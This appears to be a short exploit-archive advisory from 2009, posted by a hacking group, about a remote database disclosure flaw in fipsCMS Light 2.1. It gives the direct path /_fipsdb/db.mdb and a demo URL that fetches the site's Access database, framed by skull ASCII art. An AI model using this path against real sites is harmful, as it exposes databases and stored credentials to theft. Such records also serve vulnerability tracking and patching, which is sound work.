id: 5320
date: 06/07/2009
title: fipsCMS Light 2.1 (db.mdb) Remote Database Disclosure Vulnerability
author: ByALBAYX
cves: 

===================================================================
fipsCMS Light 2.1 (db.mdb) Remote Database Disclosure Vulnerability
===================================================================


@~~=======================================~~@
@~~=Script   : fipsCMS Light 2.1

@~~=S.Site   : http://fipsasp.com
@~~=======================================~~@

@~~=Vul      : http://c4team.org/ [Yol] /_fipsdb/db.mdb

@~~=Demo     : http://demo.fipsasp.com/fipsCMS_light/_fipsdb/db.mdb

              _.--"""""--._
            .'             '.
           /                 \
          ;       C4TEAM      ;
          |                   |
          |                   |
          ;                   ;                   
           \ (`'--,    ,--'`) /
            \ \  _ )  ( _  / /                 
             ) )(')/  \(')( (
            (_ `""` /\ `""` _)
             \`"-, /  \ ,-"`/                       
              `\ / `""` \ /`
               |/\/\/\/\/\|                      
               |\        /|
               ; |/\/\/\| ;
                \`-`--`-`/
                 \      /
                  ',__,'
@~~=======================================~~@

@~~=:/



#  0day.today [2023-03-22]  #